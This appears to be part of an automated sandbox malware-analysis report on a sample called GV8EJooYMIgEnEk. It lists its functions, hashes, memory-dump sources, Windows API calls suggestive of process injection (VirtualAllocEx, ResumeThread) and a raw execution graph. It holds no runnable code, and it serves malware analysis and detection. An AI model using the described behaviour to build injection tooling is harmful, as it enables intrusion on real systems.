                                                      • Opcode Fuzzy Hash: 2030f09ba25f9e5f1e714b9d848227a8b0b44dd4b4bedbdba8805a1a3d6efe78
                                                      • Instruction Fuzzy Hash: A321E2B5900219DFDB00CFA9D584AEEBBF5FB48324F24841AE914A3210C778A944CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 071679D9 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 71679d9-71679da 305 71679e2-71679e5 304->305 306 71679dc-71679dd 304->306 307 71679e6-7167a5b VirtualAllocEx 305->307 306->307 308 71679e0-71679e1 306->308 311 7167a64-7167a89 307->311 312 7167a5d-7167a63 307->312 308->305 312->311
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07167A4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2fccc3eab7179b45006b93c1fc7d405b93dec62868cb70092d6c78568100cac4
                                                      • Instruction ID: 4c6960315ea2a7445beb0ed53454c8517056fc8f3867bcde64bc0a12a9f66d33
                                                      • Opcode Fuzzy Hash: 2fccc3eab7179b45006b93c1fc7d405b93dec62868cb70092d6c78568100cac4
                                                      • Instruction Fuzzy Hash: 5D114A758002099FCB10CFA9D9487EFBBF5AF88318F148819E525A7250D7759A54CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167850 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: c48169b21bf198818422e8454d272878b0542b64ff30fe913c663ccd1aab7537
                                                      • Instruction ID: 043b0919f0d256a246406c1aaa6540c1f9f3a66737f006ee725c5feb6639d8b0
                                                      • Opcode Fuzzy Hash: c48169b21bf198818422e8454d272878b0542b64ff30fe913c663ccd1aab7537
                                                      • Instruction Fuzzy Hash: CC117CB1C002088BDB10CFA9C5497EFBBF8AB88718F208829D525A7240C7745905CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02759408 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02759AB1,00000800,00000000,00000000), ref: 02759CC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: d46bddf5bf7e7e6f6ebe5ce89278e1ac92a2a5bed555caee0bdcf8cac0265b66
                                                      • Instruction ID: 2fe0fb7be52de78384fe3c298618fae9b8e6c7bfd1aa4101537e0f3e5026b3b3
                                                      • Opcode Fuzzy Hash: d46bddf5bf7e7e6f6ebe5ce89278e1ac92a2a5bed555caee0bdcf8cac0265b66
                                                      • Instruction Fuzzy Hash: 041114B6900258DFDB10CFAAD544ADEFBF4EB48314F14842AE925B7200C3B9A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 071679E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07167A4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 75c44b3be28fe307b7f019cf3cd98555a86420d872e18618d3f896522d4a7d44
                                                      • Instruction ID: 74d9797a3cde712b55cb2eedbf902ea7d98b3d3e2ea045522b5c17b17b096ac8
                                                      • Opcode Fuzzy Hash: 75c44b3be28fe307b7f019cf3cd98555a86420d872e18618d3f896522d4a7d44
                                                      • Instruction Fuzzy Hash: 811137719002099FDF10CFA9D9487DFBBF9AF88328F148819E529A7250C7799A54CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0716A598 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0716A5FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 3ffb70b6d360d7284585029d7c1966534a571de52fa4f30a8ed7ec4c980f5e1d
                                                      • Instruction ID: 6c115eb1b494d15b83550d2def03c8ae93eccf9dfa10ec8a14aed2404b6560e2
                                                      • Opcode Fuzzy Hash: 3ffb70b6d360d7284585029d7c1966534a571de52fa4f30a8ed7ec4c980f5e1d
                                                      • Instruction Fuzzy Hash: E011E6B58003499FDB10CF99D989BDEBFF8EB48314F208419E515B7640D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167858 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 5daabb7bbb839389e6dcee2f57b073a5e554aa5b78072b230eb3ffab6aef59bd
                                                      • Instruction ID: a2175150a52b77d5b77f607ac9c215b53a3b0e5f79f6aaf1446edb26c04ea2bd
                                                      • Opcode Fuzzy Hash: 5daabb7bbb839389e6dcee2f57b073a5e554aa5b78072b230eb3ffab6aef59bd
                                                      • Instruction Fuzzy Hash: 22113DB1D003088BDB14DFA9D5497DFFBF9AF48318F148819D525A7240C778A944CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07166974 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0716A5FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 94ab7cb5ffd88407fd5f87c6cc950b59963ed989ac62879dd642c65886d23faf
                                                      • Instruction ID: e3b45097f282c66a0431c0e6e4ad51e1c2bd6a79926e755b40325503294ee027
                                                      • Opcode Fuzzy Hash: 94ab7cb5ffd88407fd5f87c6cc950b59963ed989ac62879dd642c65886d23faf
                                                      • Instruction Fuzzy Hash: 2E1103B58003599FDB10CF99D988BDEBBF8EF49324F20841AE925B7240D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 027599D0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02759A36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 3b2098acc190833cead4adf8733780a9c49a87608d16ff9d10dff1d0afc3aa5a
                                                      • Instruction ID: 4857fd31db8e22d2d1faf83170dc4790b354e839dd267407e17b2f93cf55088b
                                                      • Opcode Fuzzy Hash: 3b2098acc190833cead4adf8733780a9c49a87608d16ff9d10dff1d0afc3aa5a
                                                      • Instruction Fuzzy Hash: B6110FB5C00619CFDB10CF9AC544BDEFBF4AB89224F14842AD829B7200C3B8A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0267D1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8476daf6c2c0711be9ea98089846bf41ebf111badba67a5b4c13b43067c8c4a0
                                                      • Instruction ID: d6f89ee25807fa83605a4ee89aaba8a32c5893caf6456e610ccbb5c4febbdadb
                                                      • Opcode Fuzzy Hash: 8476daf6c2c0711be9ea98089846bf41ebf111badba67a5b4c13b43067c8c4a0
                                                      • Instruction Fuzzy Hash: 2F21D371604200AFDB05DF54E9C4B26BBA5FF98318F24CD69D9594B346C336D847CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0267D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 219767de7d12cc727a511c8cdc8d2f0d24e5a722205590e6a1c9d8b502f0c761
                                                      • Instruction ID: 0f2b34afb4bd9dacf5c6a160c9e2f254c1e1db69b82e15e87779e35d8565c71f
                                                      • Opcode Fuzzy Hash: 219767de7d12cc727a511c8cdc8d2f0d24e5a722205590e6a1c9d8b502f0c761
                                                      • Instruction Fuzzy Hash: FD21B075604280DFDB18DF64E9C4B26BBA5EF88318F24CD69D84A4B346C33AD847CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0267D006 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da76275fc50eddabd71bb2de71cf87f6d42327d7f708e88173e5a02a09a3b1c5
                                                      • Instruction ID: cc1a9e891383283f31ce28dc129ea723ea3ca36b5365b5b58400d724baa0acdc
                                                      • Opcode Fuzzy Hash: da76275fc50eddabd71bb2de71cf87f6d42327d7f708e88173e5a02a09a3b1c5
                                                      • Instruction Fuzzy Hash: 3E219F755093C08FCB02CF24D994B15BF71EF46214F28C6DAD8498B6A7C33A980ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0267D1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da879ffd631527e5b9c737a315258a5b95fe24a274f4089d0abe0811ce168bab
                                                      • Instruction ID: 353835f09a52f1289893b603cadf7557881f7320c3b850709b9e45681afa5031
                                                      • Opcode Fuzzy Hash: da879ffd631527e5b9c737a315258a5b95fe24a274f4089d0abe0811ce168bab
                                                      • Instruction Fuzzy Hash: 3F117975504280DFCB11CF14D6C4B16BBA1FB84224F28CAA9D9494B756C33AD44ACB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 07160234 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =$UUUU
                                                      • API String ID: 0-1997415349
                                                      • Opcode ID: cb5281f700e9553c3dbea60ec887d01c43305b051988015eb56fe4eb7355d4b0
                                                      • Instruction ID: 2bc2c431ba5e10ad7effe5c021fc95759443b3bd9fa221dc0c6791afbfc179e3
                                                      • Opcode Fuzzy Hash: cb5281f700e9553c3dbea60ec887d01c43305b051988015eb56fe4eb7355d4b0
                                                      • Instruction Fuzzy Hash: 08514970E11628CFEBA4CB69C981B89B7F2BB48314F5482E9D45CE7205DB34AE85CF15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0275C294 Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cca7abf98fb4274811f84f33e79c3c37eb4286b4a4b94e8bab0ebea16097462f
                                                      • Instruction ID: 35850cc14e3e357ae00991f6a94e4dfbdf804db004518991265f9acd746c42d9
                                                      • Opcode Fuzzy Hash: cca7abf98fb4274811f84f33e79c3c37eb4286b4a4b94e8bab0ebea16097462f
                                                      • Instruction Fuzzy Hash: 9CA14C32E0062A8FCF16DFA5C8445DEF7B3FF85304B15856AE805AB260EB71A955CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07160040 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bed2a3426b538de98f16fe6ab901a1b857690611682ade48103440b1fb2e32f
                                                      • Instruction ID: d294655a28f0eed50b22c72f6697da69766b0354091884ac93f62d7830c486e9
                                                      • Opcode Fuzzy Hash: 1bed2a3426b538de98f16fe6ab901a1b857690611682ade48103440b1fb2e32f
                                                      • Instruction Fuzzy Hash: A75170B1E016598BEB68CF6B8C4478AFAF7AFC5304F14C1BA850CA7255DB304995CF15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0716003F Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b630aa8eefbaa5826f03b9e61cf3e12a2e5b3ec631795f859c13708d76fcdb7
                                                      • Instruction ID: 8420895609366664edd771efb41d0321d463dbe5b4d6c91d1b4ba1532bee770a
                                                      • Opcode Fuzzy Hash: 0b630aa8eefbaa5826f03b9e61cf3e12a2e5b3ec631795f859c13708d76fcdb7
                                                      • Instruction Fuzzy Hash: 255181B1E006598BEB68CF6B8C4478AFAF7AFC5200F14C1BAD50CA7254EB3049958F15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 071692D0 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f873883fdda5b3409a15bf8ae0f97ad0a1335d0c3bff55d99e75a8ff68cfc4dd
                                                      • Instruction ID: 0d1e7943189d948d15496d4dff86abcc4e83875a87b2b0641e2a82a20183128a
                                                      • Opcode Fuzzy Hash: f873883fdda5b3409a15bf8ae0f97ad0a1335d0c3bff55d99e75a8ff68cfc4dd
                                                      • Instruction Fuzzy Hash: 1721BBB1D056198BEB28CF6B8C0479AFAF7BFC9300F05C1FAC40DA6295EB7459958E41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:8.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.1%
                                                      Total number of Nodes:1893
                                                      Total number of Limit Nodes:121
                                                      execution_graph 18211 408a4d 18212 419820 LdrLoadDll 18211->18212 18213 408a6a 18212->18213 18214 419820 LdrLoadDll 18213->18214 18215 408a7b 18214->18215 18216 419820 LdrLoadDll 18215->18216 18217 408a91 18216->18217 15974 408b53 15975 408ab0 7 API calls 15974->15975 15976 408b6d 15975->15976 15977 408b74 15976->15977 15978 408a50 LdrLoadDll 15976->15978 15979 408b7d 15978->15979 15980 40cf70 3 API calls 15979->15980 15981 408b85 15980->15981 17720 40815d 17721 4081b6 17720->17721 17722 40b340 2 API calls 17721->17722 17723 4081dd 17721->17723 17722->17723 16190 407c66 16205 40d430 16190->16205 16192 407e31 16193 407c83 16193->16192 16194 4133a0 LdrLoadDll 16193->16194 16195 407ce2 16194->16195 16195->16192 16208 407a20 16195->16208 16198 41b250 2 API calls 16201 407d29 16198->16201 16199 406e20 2 API calls 16199->16201 16200 40d3d0 LdrLoadDll 16200->16201 16201->16192 16201->16199 16201->16200 16204 4070e0 LdrLoadDll 16201->16204 16213 40ac00 16201->16213 16261 40ceb0 16201->16261 16204->16201 16206 40d44f 16205->16206 16207 413e50 LdrLoadDll 16205->16207 16206->16193 16207->16206 16209 41a020 2 API calls 16208->16209 16210 407a45 16209->16210 16211 407c5a 16210->16211 16212 417b00 5 API calls 16210->16212 16211->16198 16212->16211 16214 40ac1f 16213->16214 16215 40ac19 16213->16215 16287 408620 16214->16287 16277 40ccc0 16215->16277 16218 40ac2c 16219 40ac5c 16218->16219 16220 40d3d0 LdrLoadDll 16218->16220 16260 40aeb8 16218->16260 16221 417f90 LdrLoadDll 16219->16221 16220->16219 16222 40acb0 16221->16222 16223 40ad86 16222->16223 16224 418180 LdrLoadDll 16222->16224 16222->16260 16299 40aba0 16223->16299 16225 40acda 16224->16225 16225->16223 16231 40ace6 16225->16231 16228 40adad 16229 418710 2 API calls 16228->16229 16232 40adb7 16229->16232 16234 418290 LdrLoadDll 16231->16234 16241 40ad2f 16231->16241 16231->16260 16232->16201 16234->16241 16235 418710 2 API calls 16236 40ad4c 16235->16236 16296 4175b0 16236->16296 16237 40add6 16243 40adee 16237->16243 16309 40aa90 16237->16309 16240 418010 LdrLoadDll 16244 40ae02 16240->16244 16241->16235 16242 40ad63 16245 407280 2 API calls 16242->16245 16242->16260 16243->16240 16312 40a910 16244->16312 16247 40ad7c 16245->16247 16247->16201 16248 40ae26 16249 40ae73 16248->16249 16250 418040 LdrLoadDll 16248->16250 16251 4180a0 LdrLoadDll 16249->16251 16252 40ae44 16250->16252 16253 40ae81 16251->16253 16252->16249 16256 4180d0 LdrLoadDll 16252->16256 16254 418710 2 API calls 16253->16254 16255 40ae8b 16254->16255 16257 418710 2 API calls 16255->16257 16256->16249 16258 40ae95 16257->16258 16259 407280 2 API calls 16258->16259 16258->16260 16259->16260 16260->16201 16262 40cef8 16261->16262 16267 40cec0 16261->16267 16263 40cf48 16262->16263 16271 40cf13 16262->16271 16365 40cc60 16262->16365 16397 404360 16263->16397 16266 40ceef 16347 40cd10 16266->16347 16267->16262 16267->16266 16332 40bd30 16267->16332 16375 40cbe0 16271->16375 16273 40cf57 16273->16201 16276 413a50 6 API calls 16276->16263 16278 40ccc7 16277->16278 16279 40bdb0 2 API calls 16278->16279 16280 40ccd7 16279->16280 16281 40ccf0 16280->16281 16283 403d70 3 API calls 16280->16283 16282 41a270 2 API calls 16281->16282 16285 40ccfe 16282->16285 16284 40ccea 16283->16284 16286 417430 LdrLoadDll 16284->16286 16285->16214 16286->16281 16288 40863b 16287->16288 16289 40d080 2 API calls 16288->16289 16295 40875b 16288->16295 16290 40873c 16289->16290 16291 40876a 16290->16291 16292 408751 16290->16292 16293 418710 2 API calls 16290->16293 16291->16218 16294 405ea0 LdrLoadDll 16292->16294 16293->16292 16294->16295 16295->16218 16297 40d3d0 LdrLoadDll 16296->16297 16298 4175e2 16296->16298 16297->16298 16298->16242 16300 40abd6 16299->16300 16301 418180 LdrLoadDll 16299->16301 16302 418780 LdrLoadDll 16300->16302 16301->16300 16303 40abeb 16302->16303 16303->16228 16304 40ab10 16303->16304 16305 40d3d0 LdrLoadDll 16304->16305 16306 40ab40 16305->16306 16307 40d350 2 API calls 16306->16307 16308 40ab6c 16306->16308 16307->16306 16308->16228 16308->16237 16310 418290 LdrLoadDll 16309->16310 16311 40aace 16310->16311 16311->16243 16314 40a93b 16312->16314 16313 40d200 LdrLoadDll 16315 40a99a 16313->16315 16314->16313 16316 40a9e3 16315->16316 16317 418290 LdrLoadDll 16315->16317 16316->16248 16318 40a9c5 16317->16318 16319 40a9cc 16318->16319 16322 40a9ef 16318->16322 16320 4182e0 LdrLoadDll 16319->16320 16321 40a9d9 16320->16321 16323 418710 2 API calls 16321->16323 16324 40aa59 16322->16324 16325 40aa39 16322->16325 16323->16316 16327 4182e0 LdrLoadDll 16324->16327 16326 418710 2 API calls 16325->16326 16329 40aa46 16326->16329 16328 40aa6b 16327->16328 16330 418710 2 API calls 16328->16330 16329->16248 16331 40aa75 16330->16331 16331->16248 16333 40bd40 16332->16333 16334 40bda5 16332->16334 16333->16334 16402 40d010 16333->16402 16334->16266 16336 40bd50 16337 413a50 6 API calls 16336->16337 16338 40bd61 16337->16338 16339 413a50 6 API calls 16338->16339 16340 40bd6c 16339->16340 16343 40bd7a 16340->16343 16410 40b7f0 16340->16410 16342 413a50 6 API calls 16344 40bd88 16342->16344 16343->16342 16345 413a50 6 API calls 16344->16345 16346 40bd93 16345->16346 16346->16266 16348 40cd40 16347->16348 16458 412d60 16348->16458 16350 40cd81 16496 411a50 16350->16496 16352 40cd87 16530 40ed00 16352->16530 16354 40cd8d 16553 410bd0 16354->16553 16356 40cd95 16585 411d70 16356->16585 16360 40cda1 16619 4123e0 16360->16619 16362 40cda7 16645 40d720 16362->16645 16366 40cc76 16365->16366 16369 40ccb1 16365->16369 16367 41a270 2 API calls 16366->16367 16368 40cc8c 16367->16368 16368->16369 16370 4107c0 7 API calls 16368->16370 16369->16271 16371 40cc9e 16370->16371 16372 4107c0 7 API calls 16371->16372 16373 40ccaa 16372->16373 16374 41a0a0 2 API calls 16373->16374 16374->16369 16376 40cbf8 16375->16376 16380 40cc49 16375->16380 16377 40db00 6 API calls 16376->16377 16376->16380 16378 40cc33 16377->16378 16378->16380 17012 40dd50 16378->17012 16380->16273 16381 40ca20 16380->16381 16382 40ca3c 16381->16382 16387 40cb1b 16381->16387 16385 418710 2 API calls 16382->16385 16382->16387 16383 40cbb1 16384 40cbce 16383->16384 16386 413a50 6 API calls 16383->16386 16384->16263 16384->16276 16388 40ca57 16385->16388 16386->16384 16387->16383 16389 40b570 2 API calls 16387->16389 17061 40b570 16388->17061 16390 40cb8b 16389->16390 16390->16383 16394 40b7f0 2 API calls 16390->16394 16392 40ca8f 16393 409e90 LdrLoadDll 16392->16393 16395 40caa0 16393->16395 16394->16383 16396 409e90 LdrLoadDll 16395->16396 16396->16387 16398 404371 16397->16398 16399 40437a 16397->16399 16398->16399 17078 4037b0 16398->17078 16399->16273 16401 4043a0 16401->16273 16403 418460 LdrLoadDll 16402->16403 16404 40d037 16402->16404 16403->16404 16405 40d03e 16404->16405 16406 40d05c 16404->16406 16407 4184a0 LdrLoadDll 16404->16407 16405->16336 16408 418710 2 API calls 16406->16408 16407->16406 16409 40d068 16408->16409 16409->16336 16411 40b815 16410->16411 16412 40b823 16411->16412 16413 40b837 16411->16413 16414 409e90 LdrLoadDll 16412->16414 16415 409e90 LdrLoadDll 16413->16415 16416 40b832 16414->16416 16417 40b846 16415->16417 16418 409e90 LdrLoadDll 16416->16418 16420 40ba34 16416->16420 16419 40b340 2 API calls 16417->16419 16421 40b8a6 16418->16421 16419->16416 16420->16343 16422 409e90 LdrLoadDll 16421->16422 16423 40b8d7 16422->16423 16424 40b9d0 16423->16424 16426 40b400 LdrLoadDll 16423->16426 16425 40b400 LdrLoadDll 16424->16425 16428 40b9e9 16425->16428 16427 40b8fa 16426->16427 16429 40b905 16427->16429 16430 40b9af 16427->16430 16431 40b4b0 LdrLoadDll 16428->16431 16432 418710 2 API calls 16429->16432 16435 409e90 LdrLoadDll 16430->16435 16436 40b9f9 16431->16436 16433 40b90f 16432->16433 16437 409e90 LdrLoadDll 16433->16437 16434 418710 2 API calls 16434->16420 16435->16424 16436->16434 16438 40b933 16437->16438 16439 40b400 LdrLoadDll 16438->16439 16440 40b949 16439->16440 16441 418710 2 API calls 16440->16441 16442 40b953 16441->16442 16443 409e90 LdrLoadDll 16442->16443 16444 40b977 16443->16444 16445 40b400 LdrLoadDll 16444->16445 16446 40b98d 16445->16446 16451 40b4b0 16446->16451 16449 418710 2 API calls 16450 40b9a7 16449->16450 16450->16343 16452 40b4d4 16451->16452 16455 418360 16452->16455 16456 40b55b 16455->16456 16457 4191e0 LdrLoadDll 16455->16457 16456->16449 16457->16456 16459 412d88 16458->16459 16460 409e90 LdrLoadDll 16459->16460 16461 412db7 16460->16461 16462 40b340 2 API calls 16461->16462 16464 412dea 16462->16464 16463 412df1 16463->16350 16464->16463 16465 409e90 LdrLoadDll 16464->16465 16466 412e19 16465->16466 16467 409e90 LdrLoadDll 16466->16467 16468 412e3d 16467->16468 16469 40b400 LdrLoadDll 16468->16469 16470 412e61 16469->16470 16471 412ea3 16470->16471 16657 4126c0 16470->16657 16474 409e90 LdrLoadDll 16471->16474 16473 412e7a 16475 413026 16473->16475 16661 412ab0 16473->16661 16476 412ec3 16474->16476 16475->16350 16478 40b400 LdrLoadDll 16476->16478 16479 412ee7 16478->16479 16480 412f2d 16479->16480 16481 412f04 16479->16481 16484 4126c0 6 API calls 16479->16484 16482 40b400 LdrLoadDll 16480->16482 16481->16475 16485 412ab0 3 API calls 16481->16485 16483 412f5d 16482->16483 16486 412fa3 16483->16486 16487 412f7a 16483->16487 16488 4126c0 6 API calls 16483->16488 16484->16481 16485->16480 16490 40b400 LdrLoadDll 16486->16490 16487->16475 16489 412ab0 3 API calls 16487->16489 16488->16487 16489->16486 16491 413002 16490->16491 16492 41304b 16491->16492 16493 41301f 16491->16493 16495 4126c0 6 API calls 16491->16495 16492->16350 16493->16475 16494 412ab0 3 API calls 16493->16494 16494->16492 16495->16493 16497 411ab4 16496->16497 16498 409e90 LdrLoadDll 16497->16498 16499 411b81 16498->16499 16500 40b340 2 API calls 16499->16500 16502 411bb4 16500->16502 16501 411bbb 16501->16352 16502->16501 16503 409e90 LdrLoadDll 16502->16503 16504 411be3 16503->16504 16505 40b400 LdrLoadDll 16504->16505 16506 411c23 16505->16506 16507 411d43 16506->16507 16508 4126c0 6 API calls 16506->16508 16507->16352 16509 411c40 16508->16509 16510 411d52 16509->16510 16511 411870 LdrLoadDll 16509->16511 16512 418710 2 API calls 16510->16512 16513 411c58 16511->16513 16514 411d5c 16512->16514 